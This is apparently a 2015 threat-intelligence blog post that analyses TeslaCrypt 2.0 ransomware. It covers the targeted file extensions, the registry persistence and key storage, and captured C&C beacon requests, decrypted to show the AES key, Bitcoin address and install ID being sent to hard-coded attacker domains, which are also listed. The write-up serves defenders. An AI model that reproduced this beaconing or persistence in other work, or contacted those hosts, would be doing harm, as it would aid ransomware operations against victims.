Monitoring TeslaCrypt…
As part of our normal course of operations as a cyber threat intelligence provider, we monitor the cyber crime underground and provide analysis to our clients on new and emerging threats. As you can imagine, we naturally run into large quantities of malware on a daily basis. From time to time, we release findings to the public in the interest of informing the community around new threats and providing actionable analysis to support the hunt and kill missions. Below is a write up on TeslaCrypt 2.0 – we hope that you find this useful and that it helps you better protect your organization from this threat.
Should you have any questions about the details in this blog, please do not hesitate to drop us a line and we will work to get you the answers that you need.
Key Points:
• TeslaCrypt/AlphaCrypt uses AES256 encryption. The AES key is generated using a SHA256 hash and due to the keys being stored on the infected machine, victims in many cases could likely decrypt files without paying the ransom.
• The newest variant, TeslaCrypt 2.0, uses the same encryption algorithm; however, the keys and other configuration data are stored in the Windows Registry instead of a file on the local disk (as in previous versions). This version masquerades as CryptoWall.
• The command and control (C&C) communications for new variants use the same AES256 encryption for any traffic to the attacker’s server; in previous variants, only Base64 encoding was used.
Malware Capabilities
TeslaCrypt is a C++ compiled binary that begins encrypting files on infected machines immediately after execution. Notably, this family does not require an Internet connection or contact with the command and control (C&C) server to begin file encryption. It leverages internal hashing algorithms to create and encrypt files.
After launch, the first attempted network communication is to contact an IP lookup service. However, some early versions immediately try to contact the C&C instead of resolving the external IP address. The malware then includes the IP address in a “ping” to attackers’ C&C, if a connection can be established. The network traffic for some variants are Base64 encoded, while others use the same encryption algorithm as the file encryption, AES256.
The malware authors appear to be resilient at adapting to public disclosures of their malware. Since its release, the tool’s landing pages, ransom messages and decryption pages have changed several times. Initially, this malware masqueraded as CryptoLocker, but self-labeled as TeslaCrypt within the decryption page. Shortly thereafter, the attackers changed the TeslaCrypt name to “AlphaCrypt.” A subsequent version did not have any identifying “name,” but the latest version, TeslaCrypt 2.0, is masquerading as CryptoWall, going so far as to include near identical on the ransom message, decryption services and payment pages.
Distribution
iSIGHT Partners assesses that TeslaCrypt may be distributed through a variety of methods.
• TeslaCrypt has been distributed through a variety of exploit kits, including Angler, Sweet Orange and Nuclear Exploit.
• Since the malware encrypts files associated with various games, attackers may attempt to distribute it through channels likely to infect gamers. These could include, for example, malicious game-themed advertisements or posts on gaming-related forums.
• Ransomware developers often sell copies of their ransomware for other eCrime actors to use as desired, or establish business relationships in which distributors spread centrally controlled ransomware in return for a percentage of profits. Either type of arrangement can result in a specific type of ransomware being spread using disparate tactics.
Responsible Actors
Which actors or groups are responsible for developing and/or using TeslaCrypt is uncertain. Numerous actors are currently involved in ransomware operations, and observed characteristics of TeslaCrypt campaigns have been insufficient to tie the malware to specific perpetrators.
The malware’s aforementioned references to CryptoLocker and CryptoWall do not necessarily indicate that TeslaCrypt’s operators are associated with the actors behind either of these other malware types.
• Unassociated ransomware types frequently show similarities, potentially for reasons such as their developers are reusing code taken from other malware or wish to capitalize on public attention to other malware.
• The term “CryptoLocker” is treated in many eCrime communities as a generic label for any type of ransomware (i.e., locker) that encrypts. Also, the public prominence of CryptoLocker has caused a variety of actors to mimic it. So, the presence in a ransomware variant of the string “CryptoLocker” or visual similarities to CryptoLocker are not indicative of attribution to any particular actor.
Analysis of TeslaCrypt 2.0
iSIGHT Partners has analyzed several copies of TeslaCrypt/AlphaCrypt malware variants to date. The code itself does not share any significant code with other known families, but the original ransom splash screen shares a striking resemblance to that of CryptoLocker, and attackers have hard-coded several indicators claiming that the malware is CryptoLocker. In several binaries, the attackers label this malware as “CryptoLocker v3.” However, the splash screens, ransom messages and decryption pages differ across variants. The newest version, TeslaCrypt 2.0, mimics CryptoWall, another type of ransomware and multiple variants self-label as “TeslaCrypt” or “AlphaCrypt”—more unique names.
The following analysis is centered on the emergence of TeslaCrypt 2.0, which has much in common with previous variants, but some changes are noteworthy regarding the malware characteristics and behavioral analysis in the following section. A sample we analyzed has a compile date of Aug. 9, 2015. The malware disguises itself as a Microsoft executable as seen below:
In some of the very early variants/versions of TeslaCrypt, the operators’ seemed targeted at gaming and media related files for encryption. However, the attackers increased the targeted file types to include most common file types. The following is a list of the targeted file types for TeslaCrypt 2.0:
Targeted File Extensions
.r3d .css .fsh .lvl .p12 .rim .vcf
.3fr .csv .gdb .m2 .p7b .rofl .vdf
.7z .d3dbsp .gho .m3u .p7c .rtf .vfs0
.accdb .das .hkdb .m4a .pak .rw2 .vpk
.ai .dazip .hkx .map .pdd .rwl .vpp_pc
.apk .db0 .hplg .mcmeta .pdf .sav .vtf
.arch00 .dba .hvpl .mdb .pef .sb .w3x
.arw .dbf .ibank .mdbackup .pem .sid .wb2
.asset .dcr .icxs .mddata .pfx .sidd .wma
.avi .der .indd .mdf .pkpass .sidn .wmo
.bar .desc .itdb .mef .png .sie .wmv
.bay .dmp .itl .menu .ppt .sis .wotreplay
.bc6 .dng .itm .mlx .pptm .slm .wpd
.bc7 .doc .iwd .mov .pptx .snx .wps
.big .docm .iwi .mp4 .psd .sql .x3f
.bik .docx .jpe .mpqge .psk .sr2 .xf
.bkf .dwg .jpeg .mrwref .pst .srf .xlk
.bkp .dxg .jpg .ncf .ptx .srw .xls
.blob .epk .js .nrw .py .sum .xlsb
.bsa .eps .kdb .ntl .qdf .svg .xlsm
.cas .erf .kdc .odb .qic .syncdb .xlsx
.cdr .esm .kf .odc .raf .t12 .xxx
.cer .ff .layout .odm .rar .t13 .zip
.cfr .flv .lbf .odp .raw .tax .ztmp
.cr2 .forge .litemod .ods .rb .tor
.crt .fos .lrf .odt .re4 .txt
.crw .fpk .ltx .orf .rgss3a .upk
The TeslaCrypt malware is continually under development as seen from the changes in the malware’s encryption, ransom messages, naming, targeted file extensions and decryption pages. This latest variant of the malware is masquerading as CryptoWall complete with the same ransom pages and decryption pages. However, the network traffic for this variant still resembles the original malware and is distinguishable from CryptoWall.
The following is a screenshot of the splash page displayed. It is mostly indistinguishable from the initial CryptoWall page.
As seen in the above screenshot, the URLs are indicative of TeslaCrypt/AlphaCrypt rather than CryptoWall. CryptoWall typically uses Tor2Web URLs as the default, but this ransomware uses these as a backup and matches the same schema as earlier variants of the malware. Also, the “Personal Code” seen in the URI path aligns to the latest variants of TeslaCrypt/AlphaCrypt. This personal code is synonymous with the “install_id” seen in the network traffic in the sections below.
This “personal code” is used in the creation and naming of a registry key, which contains the BTC address and encryption key for the malware. In previous variants the malware stored this data in a “key.dat” or “storage.bin” file. Although some of the earlier variants also copied this data into a different registry key, it was usually a duplicate copy of the “key.dat” file.
The encryption of the files and the algorithm used has not changed since the previous variants; the malware still uses AES256. As a result of this data still residing on the infected machine via the Windows Registry, it is possible to decrypt files if the keys can be extracted from this location before they are deleted (if they are deleted).
The following image shows the Windows Registry key with this entry created.
For each encrypted file, a three-character extension is appended to the end. We have observed two distinct three-letter trigraphs for TeslaCrypt 2.0, “.aaa” and “.zzz”. After all files have been encrypted, the malware displays the above ransom message. After navigating to the provided URL for “personal PAGE,” instructions can be found that include the following: links to purchase Bitcoin, unique Bitcoin address for payment and an input field to verify payment of the ransom. The current asking price to decrypt the malware is set at 1.95BTC or approximately $500.
The following image depicts this data as well as a “draft” tracker for payments sent to the Bitcoin address (we used an invalid address for testing purposes):
Persistence Method:
The malware uses the same persistence method as previous variants with slightly different file naming schemes:
• Key: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\<personal code>
• VALUE: C:\Users\<user>\AppData\Roaming\svckew.exe
• Modification: ADD
• Note: persistence key
Registry Modifications:
As noted above, the main Windows Registry key created is the one to store the malware “configuration” or “data.”
• Key: HKCU\Software\<personal code> (i.e. 55CA21CDC91A1AB9)\data
• VALUE: 1GSSs2MHccyBwFiGLiTQKUS9fmSYYXHbw7….
• Modification: ADD
Note: This key contains data and flags that the malware sets. It starts with the BTC address, lists the key, followed by flags for “if” shadow files were deleted and “if” the key was sent to the server, and finally it lists the infection timestamp.
Command & Control Communications
Most of the previous TeslaCrypt variants we have analyzed used Base64 encoding for the check-in traffic and the “ping” request that sends data about the infected machine to the C&C server. However, this variant uses AES encryption in the same vein as the file encryption. The malware will still query a specified URL in order to retrieve the external IP address of the infected machine. After this request, it will then beacon to one of several hard-coded URLs in the malware to report on the infection, send keys, etc.
The first request to retrieve the IP address is listed below:
GET http://ipinfo.io/ip HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: ipinfo.io
HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
Content-Type: text/html; charset=utf-8
Date: Tue, 11 Aug 2015 12:39:37 GMT
Server: nginx/1.4.6 (Ubuntu)
Content-Length: 15
Connection: keep-alive
external IP address>
The next request include the characteristics of the infected machine (encrypted & decrypted examples shown):
Encrypted:
GET http://ezglobalmarketing.com/wp-content/themes/r.php?D0B1745184D4B19325F8CA239D78E804FD704B43166264942AB4248A83B5E7984901B8CB83E4B03844C46DCB4954E3FFAF30A6C250BC7D5EE85FD829061B4E956DD5240A45CCDC990C7AAFD008A7CB3CE52B9C6ECDF865AD4C051F4FD373197B9CE23CB1AFA50735DC624D9D782165F4EA6F30E5CA559DB32B2D4CFBDB22F13F55F7DC7EC2FA46DB8EA5309CD076C1F9E309C72801FC173A9747937D0E35D62A3B965447EBFDF69E4C770C3704AB729577B486369BD381148EBB781C26F68A4FA7497830FDEC2D847A9C6B29E91BA475109FF6E185D0B020ED1DBA8F04C2DAA313787189E3A6F393860FEE93CDD42191 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:31.0) Gecko/20100101 Firefox/31.0
Host: ezglobalmarketing.com
Connection: Keep-Alive
Decrypted Data:
Subject=Ping&key=A3F3A56C23EAE8A77D645AD05AFBD624CF19EFC43811EC391E6936A2B28DD731&addr=1GSSs2MHccyBwFiGLiTQKUS9fmSYYXHbw7&size=0&version=2.0.5&OS=2600&ID=0&gate=ezglobalmarketing.com&ip=<external IP>&inst_id=55CA21CDC91A1AB9
NOTE: This version is identified as 2.0.5, hence the naming of TeslaCrypt 2.0. Previous variants used incremental versioning such as .0.3.5a or .0.4.1.
HTTP/1.1 200 OK
Date: Tue, 11 Aug 2015 12:39:25 GMT
Server: Apache
X-Powered-By: PHP/5.3.28
Keep-Alive: timeout=2, max=50
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html
19
—!!!INSERTED!!!—
1
0
The third communications is a report back to the C&C and includes the “personal code” or unique ID of the infected machine:
GET http://aep554w4fm8j.fflroe598qu.com/55CA21CDC91A1AB9 HTTP/1.1
Host: aep554w4fm8j.fflroe598qu.com
Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
The following hard-coded domains (excluding the IP lookup domain) were retrieved from the TeslaCrypt 2.0 variant analyzed:
• ezglobalmarketing.com
• ledshoppen.nl
• teenpornotube.org
• shmetterheath.ru
• fgainterests.com
• serenitynowbooksandgifts.com
Let Us Know if We Can Help…
We hope that you find the information above useful in your efforts to better secure your organization. If there are lingering questions, please do not hesitate to drop us a line and we will work to answer them for you. If you’d like to learn more about what we do in monitoring the cyber crime underground, register for our upcoming webinar (9.18.15). If you would like to get a deeper look at our intelligence around cyber crime, feel free to request a free trial.
Keep fighting the good fight – we’re with you in the trenches – we’re up 24/7/365 all over the world…because someone should do something!
The post TeslaCrypt 2.0: Cyber Crime Malware Behavior, Capabilities and Communications appeared first on iSIGHT Partners.
